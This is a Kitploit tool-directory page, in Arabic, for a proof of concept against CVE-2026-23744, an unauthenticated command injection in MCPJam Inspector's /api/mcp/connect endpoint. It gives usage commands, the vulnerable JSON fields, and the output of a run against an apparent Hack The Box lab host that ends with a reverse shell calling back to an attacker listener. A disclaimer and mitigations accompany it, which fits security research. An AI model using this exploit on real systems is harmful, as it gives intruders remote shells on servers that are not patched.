Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-23744-PoC — CVE-2026-23744 هي ثغرة حقن أوامر بدون مصادقة في MCPJam Inspector ≤1.4.2 عبر /api/mcp/connect. يستغل هذا الكود البرهاني (POC) الثغرة عن طريق إرسال حمولة JSON مصمّمة خصيصًا لتنفيذ أوامر عشوائية، مما يمنح صدفة عكسية (reverse shell) مع PTY. | Kitploit
أدوات/GitHubGitHub/mluex0/cve-2026-23744-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubmluex0/cve-2026-23744-poc

CVE-2026-23744-PoC

CVE-2026-23744 هي ثغرة حقن أوامر بدون مصادقة في MCPJam Inspector ≤1.4.2 عبر /api/mcp/connect. يستغل هذا الكود البرهاني (POC) الثغرة عن طريق إرسال حمولة JSON مصمّمة خصيصًا لتنفيذ أوامر عشوائية، مما يمنح صدفة عكسية (reverse shell) مع PTY.

عرض المستودع
2منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-23744-PoC

إخلاء مسؤولية:

إثبات المفهوم هذا مُقدَّم حصريًا لأغراض البحث الأمني المصرح به والتعليم والبيئات المخبرية الخاضعة للسيطرة (مثل HTB أو CTF أو اختبار الاختراق الداخلي بموافقة كتابية صريحة). الاستخدام غير المصرح به ضد أي نظام دون إذن هو أمر غير قانوني وغير أخلاقي. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام؛ يتحمل المستخدمون وحدهم مسؤولية الامتثال لجميع القوانين واللوائح المعمول بها.


الوصف

CVE-2026-23744 هي ثغرة حقن أوامر بدون مصادقة في MCPJam Inspector (الإصدار ≤ 1.4.2).
تقبل نقطة النهاية /api/mcp/connect حمولة JSON تحتوي على serverConfig.command و serverConfig.args وتمررها مباشرة إلى إطلاق عملية نظام دون أي تنظيف. يمكن للمهاجم إرسال طلب مخصص لتنفيذ أوامر نظام عشوائية، والحصول على صدفة عكسية بصلاحيات مستخدم الخدمة.

يحتوي هذا المستودع على سكريبت استغلال كامل يعمل مع مستمع تفاعلي اختياري تلقائي قائم على PTY (مفعّل افتراضيًا).


المتطلبات

  • Python 3.6+
  • مكتبة requests ()
pip install requests

الاستخدام

مهم: قم بتوفير اسم المضيف أو عنوان IP فقط. يضيف السكريبت تلقائيًا http:// أو https://

root@kitploit:~
python3 exploit.py -t <target> -l <your_ip> [-r <port>] [--ssl] [--check-only]
الخيارالوصف
-t, --targetاسم مضيف الهدف أو عنوان IP (مطلوب)
-p, --portمنفذ الهدف (الافتراضي: 6274)
-l, --lhostعنوان IP الخاص بك للصدفة العكسية (مطلوب)
-r, --lportمنفذ المستمع لديك (الافتراضي: 4444)
--sslاستخدم HTTPS بدلاً من HTTP
--check-onlyتحقق من الثغرة فقط، دون إرسال صدفة

مثال

يبدأ السكريبت مستمعًا خاصًا به ويمنحك صدفة مباشرة في الطرفية.

root@kitploit:~
python3 exploit.py -t <example_hostname> -l <your_IP> -r <Listener_Port>

إثبات المفهوم (تشغيل ناجح)

root@kitploit:~
$ python3 exploit.py -t devhub.htb -l 10.10.14.111 -r 4444
[*] Target URL: http://devhub.htb:6274/api/mcp/connect
[*] Checking target...
[+] Target responded with 400 – appears vulnerable
[*] Sending exploit payload...
[+] ReadTimeout – shell likely spawned!
[*] Payload sent. Check your listener!

# On your listener:
connect to [10.10.14.111] from (UNKNOWN) [10.129.245.216] 54150
mcp-dev@devhub:/opt/mcpjam$ id
uid=1001(mcp-dev) gid=1001(mcp-dev) groups=1001(mcp-dev)

التخفيف

  • عقّم جميع الوسائط التي يقدمها المستخدم والمرسلة إلى دوال إطلاق العمليات.
  • لا تسمح بتنفيذ أوامر عشوائية عبر نقاط نهاية API دون قائمة بيضاء صارمة ومصادقة.
  • شغّل الخدمات بأقل الامتيازات الممكنة – أبدًا كمستخدم root.

الترخيص

هذا المستودع مخصص للأغراض التعليمية والاختبار المصرح به فقط. استخدمه على مسؤوليتك الخاصة.

Author: Mluex0
Date: August 2026

تنزيل الأداة